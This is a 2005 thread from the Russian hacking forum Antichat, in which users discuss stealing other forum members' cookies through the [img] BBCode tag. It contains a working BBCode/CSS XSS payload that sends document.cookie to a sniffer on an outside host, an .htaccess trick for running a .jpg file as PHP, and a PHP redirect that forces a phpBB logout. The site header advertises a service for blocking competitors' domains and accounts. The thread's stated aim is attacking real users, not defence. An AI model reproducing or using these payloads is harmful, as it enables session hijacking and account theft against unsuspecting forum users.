Вопрос по php

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Вопрос по php

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос по php

04.09.2005, 17:17

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

С нами: 10908092

Репутация: 2

Вопрос по php

Собственно не подскажет ли кто-нить php-код (в пхп я 0) при исполнении которого высылались бы на тот же сниффер античата кукизы?
Это я все к уязвимости через [img], когда можно заставить юзверя айти на страничку и выполнить код. Что-нибудь безобидное - типа разлогинивания - легко.. А вот как сделать что-нибудь серьезное я не знаю...
И вообще возможно ли это? ) Хотя я думаю, что возможно..

𝕏 Twitter Reddit Telegram Копировать ссылку

04.09.2005, 17:24

madnet

Умиротворенн

Регистрация: 09.12.2004

Сообщений: 996

С нами: 11272646

Репутация: 1384

хм... либо я тебя не понял, либо ты неправильно выразился. Какие кукизы тебе php должен выслать? или тебе код самого сниффире нужен?

__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА

04.09.2005, 17:46

NaX[no]rT

Members of Antichat

Регистрация: 03.09.2005

Сообщений: 594

С нами: 10886786

Репутация: 685

Никакая не уязвимость, например есть картинка которую смотрит юзер, в директории в которой есть данная картинка, там же лежит файл .htaccess с содержанием

Код:

AddType application/x-httpd-php .jpg

смотря какое расширение у картинке,т.е. jpg файл обрабатывается как php. В самом файле например sniffer.jpg идёт пхп код, который содержит переменные окружения, а он в свою очередь отсылает их в log.

04.09.2005, 17:49

NaX[no]rT

Members of Antichat

Регистрация: 03.09.2005

Сообщений: 594

С нами: 10886786

Репутация: 685

подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?

04.09.2005, 18:41

k1b0rg

Тут может быть ваша реклама.

Регистрация: 30.07.2005

Сообщений: 1,243

С нами: 10937126

Репутация: 1316

[COLOR=[*IMG]http://aaa.aa/=`aaa.jpg[/*IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]
типа что то этого ты имел ввиду?
без зведочек естественно

04.09.2005, 21:46

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

С нами: 10908092

Репутация: 2

Нет у я немного про другую уязвимость. Создаешь директорию /*.jpg . И тэгуешь ее в [img] . В директории создаешь файл index.php - и он исполняется...

Цитата:

<?php
header("Location: http://hosttobeexploited/phpBB/login.php?logout=true");
exit;
?>

Вот это как написано везде получается выполнять - разлогинивание. А вот как выполнить что-нить серьезное я хз.

04.09.2005, 23:11

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

С нами: 10908092

Репутация: 2

Цитата:

подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?

Да. так тоже можно )

04.09.2005, 23:17

Laggi

Познающий

Регистрация: 19.08.2005

Сообщений: 44

С нами: 10908092

Репутация: 2

Собственно неважно каким способом, я бы хотел добиться эффекта как в XSSе предыдущем с тэгом [url]. Загружается .jpg на страничке и при загрузке шлются кукизы юзера с этого форума.
Я думаю для тех, кто знает php на уровне пользователя не тяжело подсказать-с